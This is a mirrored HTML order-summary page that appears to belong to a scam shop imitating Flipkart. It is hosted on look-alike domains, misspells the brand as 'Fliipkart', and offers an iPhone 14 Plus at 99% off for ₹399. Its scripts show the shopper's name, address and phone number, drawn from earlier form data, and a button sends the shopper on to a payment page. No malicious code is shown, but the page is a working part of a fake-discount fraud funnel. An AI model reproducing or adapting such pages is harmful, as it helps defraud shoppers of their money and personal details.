<!DOCTYPE html>
<html lang="en-IN">

<!-- Mirrored from samargreatdayss.com/polls/order/3 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Nov 2023 07:25:46 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from graab-deals.xyz/polls/order/3.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 26 Nov 2023 03:08:58 GMT -->

<!-- Mirrored from dhanpesafree.live/polls/order/3.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 30 Dec 2023 14:45:36 GMT -->

<!-- Mirrored from salee.openioclub.site/fipkarrt/polls/order/3.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 19 Aug 2024 16:01:57 GMT -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />



<head>
    <title>We are Here to help you, Electronics, Furniture, Grocery, Lifestyle, Books &amp; More. Exclusive Offers!
    </title>
    <link rel="icon" type="image/x-icon" href="../../static/polls/img/favicon.png">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="Keywords"
        content="Online Shopping in India,online Shopping store,Online Shopping Site,Buy Online,Shop Online,Fliipkart">
    <meta name="Description"
        content="India&#39;s biggest online store for Mobiles, Fashion (Clothes/Shoes), Electronics, Home Appliances, Books, Jewelry, Home, Furniture, Sporting goods, Beauty &amp; Personal Care, Grocery and more! Find the largest selection from all brands at the lowest prices in India. Payment options - COD, EMI, Credit card, Debit card &amp; more.">
    <meta property="og:title" content="We are Here To Help You">
    <meta name="theme-color" content="#2874f0" id="themeColor">
    <meta name="viewport" content="width=device-width,minimum-scale=1,user-scalable=no">
    <link rel="stylesheet" href="../../static/polls/css/bootstrap.min.css">
    <link rel="stylesheet" href="../../static/polls/css/style.css">
    <script src="../../code.jquery.com/jquery-3.7.1.js"
        integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
</head>

<body class="expansion-alids-init" cz-shortcut-listen="true">
    <div id="container" style="overflow:hidden">
        <div style="height:100%" data-reactroot="">

            <style>
                .form-control {
                    margin-bottom: 16px;
                }

                .card {
                    --bs-border-color-translucent: rgba(0, 0, 0, 0) !important;
                }

                .card.max-height {
                    height: calc(100vh - 42px) !important;
                }

                .card-footer {
                    background: none !important;
                    border-top: none !important;
                    position: absolute;
                    bottom: 0;
                    width: 90%;
                    left: 5%;
                }
            </style>
            <div class="container-fluid p-3 header-container">
                <div class="row header">
                    <div class="col-1">
                        <div class="menu-icon" id="back_btn">
                            <svg width="19" height="16" viewBox="0 0 19 16" xmlns="http://www.w3.org/2000/svg">
                                <path d="M17.556 7.847H1M7.45 1L1 7.877l6.45 6.817" stroke="#000" stroke-width="1.5"
                                    stroke-linecap="round" stroke-linejoin="round" fill="none"></path>
                            </svg>
                        </div>
                    </div>
                    <div class="col-8">
                        <div class="menu-logo">
                            <h4 class="mb-0 mt-1 ms-2">Order Summary</h4>
                        </div>
                    </div>
                </div>
            </div>
            <div class="_1fhgRH max-height mb-70">
                <div class="card pt-1 mb-1">
                    <div class="progress-box mb-0">
                        <img class="w-100" src="../../static/polls/img/progress-indicator-summary.png" />
                    </div>
                </div>
                <div class="card px-3 py-4 mb-2">
                    <h3>Delivered to:</h3>
                    <div class="address-div mt-2">
                        <h4 class="customer-name" id="customer-name">
                        </h4>
                        <div class="mb-2 customer-address" id="customer-address"></div>
                        <div class="customer-contact" id="customer-contact"></div>
                        <p id="demo"></p>
                    </div>
                </div>
                <div class="card px-3 py-4 mb-2">
                    <ul class="list-group list-group-flush" id="deals">
                        <li class="list-group-item px-0" data-timer="2000">
                            <div class="flex recommended-product">
                                <img src="../../media/polls/images/1.jpg" id="item_image" />
                                <div class="description">
                                    <div class="product-title mb-1" id="product-title">Apple iPhone 14 Plus</div>
                                    <div class="product-detail mb-1" id="product-detail"></div>
                                    <img id="order-image" src="../../static/polls/img/SwOvZ3r.png" width="77px">
                                </div>
                            </div>
                            <div class="flex recommended-product mt-3">
                                <div class="timer qty mx-4">
                                    Qty: 1
                                </div>
                                <div class="description">
                                    <div class="price flex">
                                        <span class="discount" id="discount">99%</span> &nbsp;&nbsp;
                                        <span class="strike mrp" id="mrp">1,59,900</span> &nbsp;&nbsp;
                                        <span class="selling_price" id="selling_price">₹399.00</span>
                                    </div>
                                </div>
                            </div>
                        </li>
                    </ul>
                </div>
                <div class="card px-3 py-4 mb-2" id="price-detail">
                    <h3>Price Details</h3>
                    <div class="price-detail-div mt-2">
                        <div class="product-price-list my-3">
                            <span class="title">Price (1 item)</span>
                            <span class="data mrp me-0 td-none" id="total-price">1,59,900</span>
                        </div>
                        <div class="product-price-list my-3">
                            <span class="title">Discount</span>
                            <span class="data discount-amt text-success" id="disc-price"></span>
                        </div>
                        <div class="product-price-list my-3">
                            <span class="title">Delivery Charges</span>
                            <span class="data text-success">FREE Delivery </span>
                        </div>
                        <div class="product-price-list my-3 pt-3 total">
                            <span class="title">Total Amount </span>
                            <span class="data selling_price" id="total-price1">399</span>
                        </div>
                        <div class="product-price-list mt-3 pt-3 saved-div">
                            <span class="text-success">You will save <span class="discount-amt"
                                    id="discount-amt"></span> on this order</span>
                        </div>
                    </div>
                </div>
                <div class="sefty-banner">
                    <img class="sefty-img" src="../../static/polls/img/secure.jpg" loading="lazy" alt="">
                    <div dir="auto" class="sefty-txt">Safe and secure payments. Easy returns. 100% Authentic products.
                    </div>
                </div>
                <div class="button-container flex p-3 bg-white">
                    <div class="col-6 footer-price">
                        <span class="strike mrp ms-0 mb-1" id="mrp-footer">₹1,59,900</span>
                        <span class="selling_price" id="selling_price-footer">₹399.00</span>
                    </div>
                    <button class="buynow-button product-page-buy col-6 btn-continue" onclick="btnContinue();">
                        Continue
                    </button>
                </div>
            </div>
        </div>
        <script>
            var discount = parseFloat(document.getElementById(''))
            var oldPrice = parseFloat(document.getElementById('total-price').textContent.replace(/,/g, ''));
            var newPrice = parseFloat(document.getElementById('total-price1').textContent.replace(/,/g, ''));

            var discountAmount = oldPrice - newPrice;

            document.getElementById('disc-price').textContent = '₹' + discountAmount.toFixed(2);
            document.getElementById('total-price').textContent = '₹' + oldPrice.toFixed(2);
            document.getElementById('total-price1').textContent = '₹' + newPrice.toFixed(2);
            document.getElementById('discount-amt').textContent = '₹' + discountAmount.toFixed(2);

        </script>
        <script>
            var savedFormData = localStorage.getItem('formData');

            if (savedFormData) {
                var formData = JSON.parse(savedFormData);

                document.getElementById('customer-name').textContent = formData.fullName;
                document.getElementById('customer-address').textContent = `Address: ${formData.houseNo}, ${formData.roadName}, ${formData.city}, ${formData.state}, ${formData.pincode}`;
                document.getElementById('customer-contact').textContent = `Contact Number: ${formData.mobileNumber}`;
            } else {
                document.getElementById('demo').textContent = 'No saved data found';
            }

        </script>

        <script>
            function btnContinue() {
                window.location = "../payment/3.html";
            }
        </script>

        <footer class="seofooter" id="seofooter"></footer>

        <script defer src="../../static/polls/bootstrap.min.js"></script>
</body>


<!-- Mirrored from samargreatdayss.com/polls/order/3 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Nov 2023 07:25:46 GMT -->

<!-- Mirrored from graab-deals.xyz/polls/order/3.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 26 Nov 2023 03:08:58 GMT -->

<!-- Mirrored from dhanpesafree.live/polls/order/3.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 30 Dec 2023 14:45:37 GMT -->

<!-- Mirrored from salee.openioclub.site/fipkarrt/polls/order/3.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 19 Aug 2024 16:01:57 GMT -->
</html>